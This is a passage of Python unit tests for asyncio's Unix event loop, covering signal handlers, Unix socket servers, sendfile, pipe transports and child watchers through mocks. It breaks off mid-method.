m_signal.NSIG = signal.NSIG async def simple_coroutine(): pass # callback must not be a coroutine function coro_func = simple_coroutine coro_obj = coro_func() self.addCleanup(coro_obj.close) for func in (coro_func, coro_obj): self.assertRaisesRegex( TypeError, 'coroutines cannot be used with add_signal_handler', self.loop.add_signal_handler, signal.SIGINT, func) @mock.patch('asyncio.unix_events.signal') def test_add_signal_handler(self, m_signal): m_signal.NSIG = signal.NSIG m_signal.valid_signals = signal.valid_signals cb = lambda: True self.loop.add_signal_handler(signal.SIGHUP, cb) h = self.loop._signal_handlers.get(signal.SIGHUP) self.assertIsInstance(h, asyncio.Handle) self.assertEqual(h._callback, cb) @mock.patch('asyncio.unix_events.signal') def test_add_signal_handler_install_error(self, m_signal): m_signal.NSIG = signal.NSIG m_signal.valid_signals = signal.valid_signals def set_wakeup_fd(fd): if fd == -1: raise ValueError() m_signal.set_wakeup_fd = set_wakeup_fd class Err(OSError): errno = errno.EFAULT m_signal.signal.side_effect = Err self.assertRaises( Err, self.loop.add_signal_handler, signal.SIGINT, lambda: True) @mock.patch('asyncio.unix_events.signal') @mock.patch('asyncio.base_events.logger') def test_add_signal_handler_install_error2(self, m_logging, m_signal): m_signal.NSIG = signal.NSIG m_signal.valid_signals = signal.valid_signals class Err(OSError): errno = errno.EINVAL m_signal.signal.side_effect = Err self.loop._signal_handlers[signal.SIGHUP] = lambda: True self.assertRaises( RuntimeError, self.loop.add_signal_handler, signal.SIGINT, lambda: True) self.assertFalse(m_logging.info.called) self.assertEqual(1, m_signal.set_wakeup_fd.call_count) @mock.patch('asyncio.unix_events.signal') @mock.patch('asyncio.base_events.logger') def test_add_signal_handler_install_error3(self, m_logging, m_signal): class Err(OSError): errno = errno.EINVAL m_signal.signal.side_effect = Err m_signal.NSIG = signal.NSIG m_signal.valid_signals = signal.valid_signals 
self.assertRaises( RuntimeError, self.loop.add_signal_handler, signal.SIGINT, lambda: True) self.assertFalse(m_logging.info.called) self.assertEqual(2, m_signal.set_wakeup_fd.call_count) @mock.patch('asyncio.unix_events.signal') def test_remove_signal_handler(self, m_signal): m_signal.NSIG = signal.NSIG m_signal.valid_signals = signal.valid_signals self.loop.add_signal_handler(signal.SIGHUP, lambda: True) self.assertTrue( self.loop.remove_signal_handler(signal.SIGHUP)) self.assertTrue(m_signal.set_wakeup_fd.called) self.assertTrue(m_signal.signal.called) self.assertEqual( (signal.SIGHUP, m_signal.SIG_DFL), m_signal.signal.call_args[0]) @mock.patch('asyncio.unix_events.signal') def test_remove_signal_handler_2(self, m_signal): m_signal.NSIG = signal.NSIG m_signal.SIGINT = signal.SIGINT m_signal.valid_signals = signal.valid_signals self.loop.add_signal_handler(signal.SIGINT, lambda: True) self.loop._signal_handlers[signal.SIGHUP] = object() m_signal.set_wakeup_fd.reset_mock() self.assertTrue( self.loop.remove_signal_handler(signal.SIGINT)) self.assertFalse(m_signal.set_wakeup_fd.called) self.assertTrue(m_signal.signal.called) self.assertEqual( (signal.SIGINT, m_signal.default_int_handler), m_signal.signal.call_args[0]) @mock.patch('asyncio.unix_events.signal') @mock.patch('asyncio.base_events.logger') def test_remove_signal_handler_cleanup_error(self, m_logging, m_signal): m_signal.NSIG = signal.NSIG m_signal.valid_signals = signal.valid_signals self.loop.add_signal_handler(signal.SIGHUP, lambda: True) m_signal.set_wakeup_fd.side_effect = ValueError self.loop.remove_signal_handler(signal.SIGHUP) self.assertTrue(m_logging.info) @mock.patch('asyncio.unix_events.signal') def test_remove_signal_handler_error(self, m_signal): m_signal.NSIG = signal.NSIG m_signal.valid_signals = signal.valid_signals self.loop.add_signal_handler(signal.SIGHUP, lambda: True) m_signal.signal.side_effect = OSError self.assertRaises( OSError, self.loop.remove_signal_handler, signal.SIGHUP) 
@mock.patch('asyncio.unix_events.signal') def test_remove_signal_handler_error2(self, m_signal): m_signal.NSIG = signal.NSIG m_signal.valid_signals = signal.valid_signals self.loop.add_signal_handler(signal.SIGHUP, lambda: True) class Err(OSError): errno = errno.EINVAL m_signal.signal.side_effect = Err self.assertRaises( RuntimeError, self.loop.remove_signal_handler, signal.SIGHUP) @mock.patch('asyncio.unix_events.signal') def test_close(self, m_signal): m_signal.NSIG = signal.NSIG m_signal.valid_signals = signal.valid_signals self.loop.add_signal_handler(signal.SIGHUP, lambda: True) self.loop.add_signal_handler(signal.SIGCHLD, lambda: True) self.assertEqual(len(self.loop._signal_handlers), 2) m_signal.set_wakeup_fd.reset_mock() self.loop.close() self.assertEqual(len(self.loop._signal_handlers), 0) m_signal.set_wakeup_fd.assert_called_once_with(-1) @mock.patch('asyncio.unix_events.sys') @mock.patch('asyncio.unix_events.signal') def test_close_on_finalizing(self, m_signal, m_sys): m_signal.NSIG = signal.NSIG m_signal.valid_signals = signal.valid_signals self.loop.add_signal_handler(signal.SIGHUP, lambda: True) self.assertEqual(len(self.loop._signal_handlers), 1) m_sys.is_finalizing.return_value = True m_signal.signal.reset_mock() with self.assertWarnsRegex(ResourceWarning, "skipping signal handlers removal"): self.loop.close() self.assertEqual(len(self.loop._signal_handlers), 0) self.assertFalse(m_signal.signal.called) @unittest.skipUnless(hasattr(socket, 'AF_UNIX'), 'UNIX Sockets are not supported') class SelectorEventLoopUnixSocketTests(test_utils.TestCase): def setUp(self): super().setUp() self.loop = asyncio.SelectorEventLoop() self.set_event_loop(self.loop) @support.skip_unless_bind_unix_socket def test_create_unix_server_existing_path_sock(self): with test_utils.unix_socket_path() as path: sock = socket.socket(socket.AF_UNIX) sock.bind(path) sock.listen(1) sock.close() coro = self.loop.create_unix_server(lambda: None, path) srv = 
self.loop.run_until_complete(coro) srv.close() self.loop.run_until_complete(srv.wait_closed()) @support.skip_unless_bind_unix_socket def test_create_unix_server_pathlib(self): with test_utils.unix_socket_path() as path: path = pathlib.Path(path) srv_coro = self.loop.create_unix_server(lambda: None, path) srv = self.loop.run_until_complete(srv_coro) srv.close() self.loop.run_until_complete(srv.wait_closed()) def test_create_unix_connection_pathlib(self): with test_utils.unix_socket_path() as path: path = pathlib.Path(path) coro = self.loop.create_unix_connection(lambda: None, path) with self.assertRaises(FileNotFoundError): # If pathlib.Path wasn't supported, the exception would be # different. self.loop.run_until_complete(coro) def test_create_unix_server_existing_path_nonsock(self): with tempfile.NamedTemporaryFile() as file: coro = self.loop.create_unix_server(lambda: None, file.name) with self.assertRaisesRegex(OSError, 'Address.*is already in use'): self.loop.run_until_complete(coro) def test_create_unix_server_ssl_bool(self): coro = self.loop.create_unix_server(lambda: None, path='spam', ssl=True) with self.assertRaisesRegex(TypeError, 'ssl argument must be an SSLContext'): self.loop.run_until_complete(coro) def test_create_unix_server_nopath_nosock(self): coro = self.loop.create_unix_server(lambda: None, path=None) with self.assertRaisesRegex(ValueError, 'path was not specified, and no sock'): self.loop.run_until_complete(coro) def test_create_unix_server_path_inetsock(self): sock = socket.socket() with sock: coro = self.loop.create_unix_server(lambda: None, path=None, sock=sock) with self.assertRaisesRegex(ValueError, 'A UNIX Domain Stream.*was expected'): self.loop.run_until_complete(coro) def test_create_unix_server_path_dgram(self): sock = socket.socket(socket.AF_UNIX, socket.SOCK_DGRAM) with sock: coro = self.loop.create_unix_server(lambda: None, path=None, sock=sock) with self.assertRaisesRegex(ValueError, 'A UNIX Domain Stream.*was expected'): 
self.loop.run_until_complete(coro) @unittest.skipUnless(hasattr(socket, 'SOCK_NONBLOCK'), 'no socket.SOCK_NONBLOCK (linux only)') @support.skip_unless_bind_unix_socket def test_create_unix_server_path_stream_bittype(self): sock = socket.socket( socket.AF_UNIX, socket.SOCK_STREAM | socket.SOCK_NONBLOCK) with tempfile.NamedTemporaryFile() as file: fn = file.name try: with sock: sock.bind(fn) coro = self.loop.create_unix_server(lambda: None, path=None, sock=sock) srv = self.loop.run_until_complete(coro) srv.close() self.loop.run_until_complete(srv.wait_closed()) finally: os.unlink(fn) def test_create_unix_server_ssl_timeout_with_plain_sock(self): coro = self.loop.create_unix_server(lambda: None, path='spam', ssl_handshake_timeout=1) with self.assertRaisesRegex( ValueError, 'ssl_handshake_timeout is only meaningful with ssl'): self.loop.run_until_complete(coro) def test_create_unix_connection_path_inetsock(self): sock = socket.socket() with sock: coro = self.loop.create_unix_connection(lambda: None, sock=sock) with self.assertRaisesRegex(ValueError, 'A UNIX Domain Stream.*was expected'): self.loop.run_until_complete(coro) @mock.patch('asyncio.unix_events.socket') def test_create_unix_server_bind_error(self, m_socket): # Ensure that the socket is closed on any bind error sock = mock.Mock() m_socket.socket.return_value = sock sock.bind.side_effect = OSError coro = self.loop.create_unix_server(lambda: None, path="/test") with self.assertRaises(OSError): self.loop.run_until_complete(coro) self.assertTrue(sock.close.called) sock.bind.side_effect = MemoryError coro = self.loop.create_unix_server(lambda: None, path="/test") with self.assertRaises(MemoryError): self.loop.run_until_complete(coro) self.assertTrue(sock.close.called) def test_create_unix_connection_path_sock(self): coro = self.loop.create_unix_connection( lambda: None, os.devnull, sock=object()) with self.assertRaisesRegex(ValueError, 'path and sock can not be'): self.loop.run_until_complete(coro) def 
test_create_unix_connection_nopath_nosock(self): coro = self.loop.create_unix_connection( lambda: None, None) with self.assertRaisesRegex(ValueError, 'no path and sock were specified'): self.loop.run_until_complete(coro) def test_create_unix_connection_nossl_serverhost(self): coro = self.loop.create_unix_connection( lambda: None, os.devnull, server_hostname='spam') with self.assertRaisesRegex(ValueError, 'server_hostname is only meaningful'): self.loop.run_until_complete(coro) def test_create_unix_connection_ssl_noserverhost(self): coro = self.loop.create_unix_connection( lambda: None, os.devnull, ssl=True) with self.assertRaisesRegex( ValueError, 'you have to pass server_hostname when using ssl'): self.loop.run_until_complete(coro) def test_create_unix_connection_ssl_timeout_with_plain_sock(self): coro = self.loop.create_unix_connection(lambda: None, path='spam', ssl_handshake_timeout=1) with self.assertRaisesRegex( ValueError, 'ssl_handshake_timeout is only meaningful with ssl'): self.loop.run_until_complete(coro) @unittest.skipUnless(hasattr(os, 'sendfile'), 'sendfile is not supported') class SelectorEventLoopUnixSockSendfileTests(test_utils.TestCase): DATA = b"12345abcde" * 16 * 1024 # 160 KiB class MyProto(asyncio.Protocol): def __init__(self, loop): self.started = False self.closed = False self.data = bytearray() self.fut = loop.create_future() self.transport = None self._ready = loop.create_future() def connection_made(self, transport): self.started = True self.transport = transport self._ready.set_result(None) def data_received(self, data): self.data.extend(data) def connection_lost(self, exc): self.closed = True self.fut.set_result(None) async def wait_closed(self): await self.fut @classmethod def setUpClass(cls): with open(support.TESTFN, 'wb') as fp: fp.write(cls.DATA) super().setUpClass() @classmethod def tearDownClass(cls): support.unlink(support.TESTFN) super().tearDownClass() def setUp(self): self.loop = asyncio.new_event_loop() 
self.set_event_loop(self.loop) self.file = open(support.TESTFN, 'rb') self.addCleanup(self.file.close) super().setUp() def make_socket(self, cleanup=True): sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.setblocking(False) sock.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, 1024) sock.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, 1024) if cleanup: self.addCleanup(sock.close) return sock def run_loop(self, coro): return self.loop.run_until_complete(coro) def prepare(self): sock = self.make_socket() proto = self.MyProto(self.loop) port = support.find_unused_port() srv_sock = self.make_socket(cleanup=False) srv_sock.bind((support.HOST, port)) server = self.run_loop(self.loop.create_server( lambda: proto, sock=srv_sock)) self.run_loop(self.loop.sock_connect(sock, (support.HOST, port))) self.run_loop(proto._ready) def cleanup(): proto.transport.close() self.run_loop(proto.wait_closed()) server.close() self.run_loop(server.wait_closed()) self.addCleanup(cleanup) return sock, proto def test_sock_sendfile_not_available(self): sock, proto = self.prepare() with mock.patch('asyncio.unix_events.os', spec=[]): with self.assertRaisesRegex(asyncio.SendfileNotAvailableError, "os[.]sendfile[(][)] is not available"): self.run_loop(self.loop._sock_sendfile_native(sock, self.file, 0, None)) self.assertEqual(self.file.tell(), 0) def test_sock_sendfile_not_a_file(self): sock, proto = self.prepare() f = object() with self.assertRaisesRegex(asyncio.SendfileNotAvailableError, "not a regular file"): self.run_loop(self.loop._sock_sendfile_native(sock, f, 0, None)) self.assertEqual(self.file.tell(), 0) def test_sock_sendfile_iobuffer(self): sock, proto = self.prepare() f = io.BytesIO() with self.assertRaisesRegex(asyncio.SendfileNotAvailableError, "not a regular file"): self.run_loop(self.loop._sock_sendfile_native(sock, f, 0, None)) self.assertEqual(self.file.tell(), 0) def test_sock_sendfile_not_regular_file(self): sock, proto = self.prepare() f = mock.Mock() 
f.fileno.return_value = -1 with self.assertRaisesRegex(asyncio.SendfileNotAvailableError, "not a regular file"): self.run_loop(self.loop._sock_sendfile_native(sock, f, 0, None)) self.assertEqual(self.file.tell(), 0) def test_sock_sendfile_cancel1(self): sock, proto = self.prepare() fut = self.loop.create_future() fileno = self.file.fileno() self.loop._sock_sendfile_native_impl(fut, None, sock, fileno, 0, None, len(self.DATA), 0) fut.cancel() with contextlib.suppress(asyncio.CancelledError): self.run_loop(fut) with self.assertRaises(KeyError): self.loop._selector.get_key(sock) def test_sock_sendfile_cancel2(self): sock, proto = self.prepare() fut = self.loop.create_future() fileno = self.file.fileno() self.loop._sock_sendfile_native_impl(fut, None, sock, fileno, 0, None, len(self.DATA), 0) fut.cancel() self.loop._sock_sendfile_native_impl(fut, sock.fileno(), sock, fileno, 0, None, len(self.DATA), 0) with self.assertRaises(KeyError): self.loop._selector.get_key(sock) def test_sock_sendfile_blocking_error(self): sock, proto = self.prepare() fileno = self.file.fileno() fut = mock.Mock() fut.cancelled.return_value = False with mock.patch('os.sendfile', side_effect=BlockingIOError()): self.loop._sock_sendfile_native_impl(fut, None, sock, fileno, 0, None, len(self.DATA), 0) key = self.loop._selector.get_key(sock) self.assertIsNotNone(key) fut.add_done_callback.assert_called_once_with(mock.ANY) def test_sock_sendfile_os_error_first_call(self): sock, proto = self.prepare() fileno = self.file.fileno() fut = self.loop.create_future() with mock.patch('os.sendfile', side_effect=OSError()): self.loop._sock_sendfile_native_impl(fut, None, sock, fileno, 0, None, len(self.DATA), 0) with self.assertRaises(KeyError): self.loop._selector.get_key(sock) exc = fut.exception() self.assertIsInstance(exc, asyncio.SendfileNotAvailableError) self.assertEqual(0, self.file.tell()) def test_sock_sendfile_os_error_next_call(self): sock, proto = self.prepare() fileno = self.file.fileno() fut = 
self.loop.create_future() err = OSError() with mock.patch('os.sendfile', side_effect=err): self.loop._sock_sendfile_native_impl(fut, sock.fileno(), sock, fileno, 1000, None, len(self.DATA), 1000) with self.assertRaises(KeyError): self.loop._selector.get_key(sock) exc = fut.exception() self.assertIs(exc, err) self.assertEqual(1000, self.file.tell()) def test_sock_sendfile_exception(self): sock, proto = self.prepare() fileno = self.file.fileno() fut = self.loop.create_future() err = asyncio.SendfileNotAvailableError() with mock.patch('os.sendfile', side_effect=err): self.loop._sock_sendfile_native_impl(fut, sock.fileno(), sock, fileno, 1000, None, len(self.DATA), 1000) with self.assertRaises(KeyError): self.loop._selector.get_key(sock) exc = fut.exception() self.assertIs(exc, err) self.assertEqual(1000, self.file.tell()) class UnixReadPipeTransportTests(test_utils.TestCase): def setUp(self): super().setUp() self.loop = self.new_test_loop() self.protocol = test_utils.make_test_protocol(asyncio.Protocol) self.pipe = mock.Mock(spec_set=io.RawIOBase) self.pipe.fileno.return_value = 5 blocking_patcher = mock.patch('os.set_blocking') blocking_patcher.start() self.addCleanup(blocking_patcher.stop) fstat_patcher = mock.patch('os.fstat') m_fstat = fstat_patcher.start() st = mock.Mock() st.st_mode = stat.S_IFIFO m_fstat.return_value = st self.addCleanup(fstat_patcher.stop) def read_pipe_transport(self, waiter=None): transport = unix_events._UnixReadPipeTransport(self.loop, self.pipe, self.protocol, waiter=waiter) self.addCleanup(close_pipe_transport, transport) return transport def test_ctor(self): waiter = asyncio.Future(loop=self.loop) tr = self.read_pipe_transport(waiter=waiter) self.loop.run_until_complete(waiter) self.protocol.connection_made.assert_called_with(tr) self.loop.assert_reader(5, tr._read_ready) self.assertIsNone(waiter.result()) @mock.patch('os.read') def test__read_ready(self, m_read): tr = self.read_pipe_transport() m_read.return_value = b'data' 
# NOTE(review): this chunk begins mid-class -- the UnixReadPipeTransportTests
# class header (and the start of the test whose tail appears below) lie
# outside this view.
        tr._read_ready()
        m_read.assert_called_with(5, tr.max_size)
        self.protocol.data_received.assert_called_with(b'data')

    @mock.patch('os.read')
    def test__read_ready_eof(self, m_read):
        # EOF (empty read) stops reading and notifies the protocol.
        tr = self.read_pipe_transport()
        m_read.return_value = b''
        tr._read_ready()
        m_read.assert_called_with(5, tr.max_size)
        self.assertFalse(self.loop.readers)
        test_utils.run_briefly(self.loop)
        self.protocol.eof_received.assert_called_with()
        self.protocol.connection_lost.assert_called_with(None)

    @mock.patch('os.read')
    def test__read_ready_blocked(self, m_read):
        # A would-block read must not deliver data to the protocol.
        tr = self.read_pipe_transport()
        m_read.side_effect = BlockingIOError
        tr._read_ready()
        m_read.assert_called_with(5, tr.max_size)
        test_utils.run_briefly(self.loop)
        self.assertFalse(self.protocol.data_received.called)

    @mock.patch('asyncio.log.logger.error')
    @mock.patch('os.read')
    def test__read_ready_error(self, m_read, m_logexc):
        # An OSError from os.read is fatal: logged and closes the transport.
        tr = self.read_pipe_transport()
        err = OSError()
        m_read.side_effect = err
        tr._close = mock.Mock()
        tr._read_ready()
        m_read.assert_called_with(5, tr.max_size)
        tr._close.assert_called_with(err)
        m_logexc.assert_called_with(
            test_utils.MockPattern(
                'Fatal read error on pipe transport'
                '\nprotocol:.*\ntransport:.*'),
            exc_info=(OSError, MOCK_ANY, MOCK_ANY))

    @mock.patch('os.read')
    def test_pause_reading(self, m_read):
        tr = self.read_pipe_transport()
        m = mock.Mock()
        self.loop.add_reader(5, m)
        tr.pause_reading()
        self.assertFalse(self.loop.readers)

    @mock.patch('os.read')
    def test_resume_reading(self, m_read):
        tr = self.read_pipe_transport()
        tr.resume_reading()
        self.loop.assert_reader(5, tr._read_ready)

    @mock.patch('os.read')
    def test_close(self, m_read):
        tr = self.read_pipe_transport()
        tr._close = mock.Mock()
        tr.close()
        tr._close.assert_called_with(None)

    @mock.patch('os.read')
    def test_close_already_closing(self, m_read):
        # close() on an already-closing transport must be a no-op.
        tr = self.read_pipe_transport()
        tr._closing = True
        tr._close = mock.Mock()
        tr.close()
        self.assertFalse(tr._close.called)

    @mock.patch('os.read')
    def test__close(self, m_read):
        tr = self.read_pipe_transport()
        err = object()
        tr._close(err)
        self.assertTrue(tr.is_closing())
        self.assertFalse(self.loop.readers)
        test_utils.run_briefly(self.loop)
        self.protocol.connection_lost.assert_called_with(err)

    def test__call_connection_lost(self):
        # connection_lost(None) detaches protocol/loop and closes the pipe.
        tr = self.read_pipe_transport()
        self.assertIsNotNone(tr._protocol)
        self.assertIsNotNone(tr._loop)
        err = None
        tr._call_connection_lost(err)
        self.protocol.connection_lost.assert_called_with(err)
        self.pipe.close.assert_called_with()
        self.assertIsNone(tr._protocol)
        self.assertIsNone(tr._loop)

    def test__call_connection_lost_with_err(self):
        tr = self.read_pipe_transport()
        self.assertIsNotNone(tr._protocol)
        self.assertIsNotNone(tr._loop)
        err = OSError()
        tr._call_connection_lost(err)
        self.protocol.connection_lost.assert_called_with(err)
        self.pipe.close.assert_called_with()
        self.assertIsNone(tr._protocol)
        self.assertIsNone(tr._loop)


class UnixWritePipeTransportTests(test_utils.TestCase):
    """Tests for the write end of asyncio's unix pipe transport.

    The pipe is a mock with fileno() == 5; os.set_blocking and os.fstat are
    patched so no real file descriptor is touched.
    """

    def setUp(self):
        super().setUp()
        self.loop = self.new_test_loop()
        self.protocol = test_utils.make_test_protocol(asyncio.BaseProtocol)
        self.pipe = mock.Mock(spec_set=io.RawIOBase)
        self.pipe.fileno.return_value = 5

        blocking_patcher = mock.patch('os.set_blocking')
        blocking_patcher.start()
        self.addCleanup(blocking_patcher.stop)

        fstat_patcher = mock.patch('os.fstat')
        m_fstat = fstat_patcher.start()
        st = mock.Mock()
        # report a socket so the transport registers a reader for HUP detection
        st.st_mode = stat.S_IFSOCK
        m_fstat.return_value = st
        self.addCleanup(fstat_patcher.stop)

    def write_pipe_transport(self, waiter=None):
        # Helper: build a transport whose cleanup is handled by addCleanup.
        transport = unix_events._UnixWritePipeTransport(self.loop, self.pipe,
                                                        self.protocol,
                                                        waiter=waiter)
        self.addCleanup(close_pipe_transport, transport)
        return transport

    def test_ctor(self):
        waiter = asyncio.Future(loop=self.loop)
        tr = self.write_pipe_transport(waiter=waiter)
        self.loop.run_until_complete(waiter)

        self.protocol.connection_made.assert_called_with(tr)
        self.loop.assert_reader(5, tr._read_ready)
        self.assertEqual(None, waiter.result())

    def test_can_write_eof(self):
        tr = self.write_pipe_transport()
        self.assertTrue(tr.can_write_eof())

    @mock.patch('os.write')
    def test_write(self, m_write):
        # Full write: nothing buffered, no writer registered.
        tr = self.write_pipe_transport()
        m_write.return_value = 4
        tr.write(b'data')
        m_write.assert_called_with(5, b'data')
        self.assertFalse(self.loop.writers)
        self.assertEqual(bytearray(), tr._buffer)

    @mock.patch('os.write')
    def test_write_no_data(self, m_write):
        tr = self.write_pipe_transport()
        tr.write(b'')
        self.assertFalse(m_write.called)
        self.assertFalse(self.loop.writers)
        self.assertEqual(bytearray(b''), tr._buffer)

    @mock.patch('os.write')
    def test_write_partial(self, m_write):
        # Only 2 of 4 bytes written: remainder buffered, writer registered.
        tr = self.write_pipe_transport()
        m_write.return_value = 2
        tr.write(b'data')
        self.loop.assert_writer(5, tr._write_ready)
        self.assertEqual(bytearray(b'ta'), tr._buffer)

    @mock.patch('os.write')
    def test_write_buffer(self, m_write):
        # With data already buffered, writes append without calling os.write.
        tr = self.write_pipe_transport()
        self.loop.add_writer(5, tr._write_ready)
        tr._buffer = bytearray(b'previous')
        tr.write(b'data')
        self.assertFalse(m_write.called)
        self.loop.assert_writer(5, tr._write_ready)
        self.assertEqual(bytearray(b'previousdata'), tr._buffer)

    @mock.patch('os.write')
    def test_write_again(self, m_write):
        # EAGAIN: everything gets buffered and a writer is registered.
        tr = self.write_pipe_transport()
        m_write.side_effect = BlockingIOError()
        tr.write(b'data')
        m_write.assert_called_with(5, bytearray(b'data'))
        self.loop.assert_writer(5, tr._write_ready)
        self.assertEqual(bytearray(b'data'), tr._buffer)

    @mock.patch('asyncio.unix_events.logger')
    @mock.patch('os.write')
    def test_write_err(self, m_write, m_log):
        tr = self.write_pipe_transport()
        err = OSError()
        m_write.side_effect = err
        tr._fatal_error = mock.Mock()
        tr.write(b'data')
        m_write.assert_called_with(5, b'data')
        self.assertFalse(self.loop.writers)
        self.assertEqual(bytearray(), tr._buffer)
        tr._fatal_error.assert_called_with(
            err, 'Fatal write error on pipe transport')
        self.assertEqual(1, tr._conn_lost)

        tr.write(b'data')
        self.assertEqual(2, tr._conn_lost)
        tr.write(b'data')
        tr.write(b'data')
        tr.write(b'data')
        tr.write(b'data')
        # This is a bit overspecified. :-(
        m_log.warning.assert_called_with(
            'pipe closed by peer or os.write(pipe, data) raised exception.')
        tr.close()

    @mock.patch('os.write')
    def test_write_close(self, m_write):
        tr = self.write_pipe_transport()
        tr._read_ready()  # pipe was closed by peer

        tr.write(b'data')
        self.assertEqual(tr._conn_lost, 1)
        tr.write(b'data')
        self.assertEqual(tr._conn_lost, 2)

    def test__read_ready(self):
        # Readability on the write end means the peer closed the pipe.
        tr = self.write_pipe_transport()
        tr._read_ready()
        self.assertFalse(self.loop.readers)
        self.assertFalse(self.loop.writers)
        self.assertTrue(tr.is_closing())
        test_utils.run_briefly(self.loop)
        self.protocol.connection_lost.assert_called_with(None)

    @mock.patch('os.write')
    def test__write_ready(self, m_write):
        tr = self.write_pipe_transport()
        self.loop.add_writer(5, tr._write_ready)
        tr._buffer = bytearray(b'data')
        m_write.return_value = 4
        tr._write_ready()
        self.assertFalse(self.loop.writers)
        self.assertEqual(bytearray(), tr._buffer)

    @mock.patch('os.write')
    def test__write_ready_partial(self, m_write):
        tr = self.write_pipe_transport()
        self.loop.add_writer(5, tr._write_ready)
        tr._buffer = bytearray(b'data')
        m_write.return_value = 3
        tr._write_ready()
        self.loop.assert_writer(5, tr._write_ready)
        self.assertEqual(bytearray(b'a'), tr._buffer)

    @mock.patch('os.write')
    def test__write_ready_again(self, m_write):
        tr = self.write_pipe_transport()
        self.loop.add_writer(5, tr._write_ready)
        tr._buffer = bytearray(b'data')
        m_write.side_effect = BlockingIOError()
        tr._write_ready()
        m_write.assert_called_with(5, bytearray(b'data'))
        self.loop.assert_writer(5, tr._write_ready)
        self.assertEqual(bytearray(b'data'), tr._buffer)

    @mock.patch('os.write')
    def test__write_ready_empty(self, m_write):
        # A zero-byte write keeps the buffer and the writer registration.
        tr = self.write_pipe_transport()
        self.loop.add_writer(5, tr._write_ready)
        tr._buffer = bytearray(b'data')
        m_write.return_value = 0
        tr._write_ready()
        m_write.assert_called_with(5, bytearray(b'data'))
        self.loop.assert_writer(5, tr._write_ready)
        self.assertEqual(bytearray(b'data'), tr._buffer)

    @mock.patch('asyncio.log.logger.error')
    @mock.patch('os.write')
    def test__write_ready_err(self, m_write, m_logexc):
        tr = self.write_pipe_transport()
        self.loop.add_writer(5, tr._write_ready)
        tr._buffer = bytearray(b'data')
        m_write.side_effect = err = OSError()
        tr._write_ready()
        self.assertFalse(self.loop.writers)
        self.assertFalse(self.loop.readers)
        self.assertEqual(bytearray(), tr._buffer)
        self.assertTrue(tr.is_closing())
        m_logexc.assert_not_called()
        self.assertEqual(1, tr._conn_lost)
        test_utils.run_briefly(self.loop)
        self.protocol.connection_lost.assert_called_with(err)

    @mock.patch('os.write')
    def test__write_ready_closing(self, m_write):
        tr = self.write_pipe_transport()
        self.loop.add_writer(5, tr._write_ready)
        tr._closing = True
        tr._buffer = bytearray(b'data')
        m_write.return_value = 4
        tr._write_ready()
        self.assertFalse(self.loop.writers)
        self.assertFalse(self.loop.readers)
        self.assertEqual(bytearray(), tr._buffer)
        self.protocol.connection_lost.assert_called_with(None)
        self.pipe.close.assert_called_with()

    @mock.patch('os.write')
    def test_abort(self, m_write):
        # abort() drops buffered data without writing it.
        tr = self.write_pipe_transport()
        self.loop.add_writer(5, tr._write_ready)
        self.loop.add_reader(5, tr._read_ready)
        tr._buffer = [b'da', b'ta']
        tr.abort()
        self.assertFalse(m_write.called)
        self.assertFalse(self.loop.readers)
        self.assertFalse(self.loop.writers)
        self.assertEqual([], tr._buffer)
        self.assertTrue(tr.is_closing())
        test_utils.run_briefly(self.loop)
        self.protocol.connection_lost.assert_called_with(None)

    def test__call_connection_lost(self):
        tr = self.write_pipe_transport()
        self.assertIsNotNone(tr._protocol)
        self.assertIsNotNone(tr._loop)
        err = None
        tr._call_connection_lost(err)
        self.protocol.connection_lost.assert_called_with(err)
        self.pipe.close.assert_called_with()
        self.assertIsNone(tr._protocol)
        self.assertIsNone(tr._loop)

    def test__call_connection_lost_with_err(self):
        tr = self.write_pipe_transport()
        self.assertIsNotNone(tr._protocol)
        self.assertIsNotNone(tr._loop)
        err = OSError()
        tr._call_connection_lost(err)
        self.protocol.connection_lost.assert_called_with(err)
        self.pipe.close.assert_called_with()
        self.assertIsNone(tr._protocol)
        self.assertIsNone(tr._loop)

    def test_close(self):
        tr = self.write_pipe_transport()
        tr.write_eof = mock.Mock()
        tr.close()
        tr.write_eof.assert_called_with()

        # closing the transport twice must not fail
        tr.close()

    def test_close_closing(self):
        tr = self.write_pipe_transport()
        tr.write_eof = mock.Mock()
        tr._closing = True
        tr.close()
        self.assertFalse(tr.write_eof.called)

    def test_write_eof(self):
        tr = self.write_pipe_transport()
        tr.write_eof()
        self.assertTrue(tr.is_closing())
        self.assertFalse(self.loop.readers)
        test_utils.run_briefly(self.loop)
        self.protocol.connection_lost.assert_called_with(None)

    def test_write_eof_pending(self):
        # write_eof with buffered data: closing, but connection_lost deferred.
        tr = self.write_pipe_transport()
        tr._buffer = [b'data']
        tr.write_eof()
        self.assertTrue(tr.is_closing())
        self.assertFalse(self.protocol.connection_lost.called)


class AbstractChildWatcherTests(unittest.TestCase):
    # Every AbstractChildWatcher entry point must raise NotImplementedError.

    def test_not_implemented(self):
        f = mock.Mock()
        watcher = asyncio.AbstractChildWatcher()
        self.assertRaises(
            NotImplementedError, watcher.add_child_handler, f, f)
        self.assertRaises(
            NotImplementedError, watcher.remove_child_handler, f)
        self.assertRaises(
            NotImplementedError, watcher.attach_loop, f)
        self.assertRaises(
            NotImplementedError, watcher.close)
        self.assertRaises(
            NotImplementedError, watcher.__enter__)
        self.assertRaises(
            NotImplementedError, watcher.__exit__, f, f, f)


class BaseChildWatcherTests(unittest.TestCase):

    def test_not_implemented(self):
        f = mock.Mock()
        watcher = unix_events.BaseChildWatcher()
        self.assertRaises(
            NotImplementedError, watcher._do_waitpid, f)


# Bundle of the patched os.* wait-status mocks handed to @waitpid_mocks tests.
WaitPidMocks = collections.namedtuple("WaitPidMocks",
                                      ("waitpid",
                                       "WIFEXITED",
                                       "WIFSIGNALED",
                                       "WEXITSTATUS",
                                       "WTERMSIG",
                                       ))


class ChildWatcherTestsMixin:
    """Shared child-watcher tests; subclasses provide create_watcher()."""

    ignore_warnings = mock.patch.object(log.logger, "warning")

    def setUp(self):
        super().setUp()
        self.loop = self.new_test_loop()
        # fake-process state driven by waitpid()/add_zombie() below
        self.running = False
        self.zombies = {}
# NOTE(review): continuation of ChildWatcherTestsMixin.setUp() started in the
# previous chunk -- the lines below remain at method/class indentation.
        with mock.patch.object(
                self.loop, "add_signal_handler") as self.m_add_signal_handler:
            self.watcher = self.create_watcher()
            self.watcher.attach_loop(self.loop)

    def waitpid(self, pid, flags):
        # Fake os.waitpid backed by self.zombies / self.running.
        if isinstance(self.watcher, asyncio.SafeChildWatcher) or pid != -1:
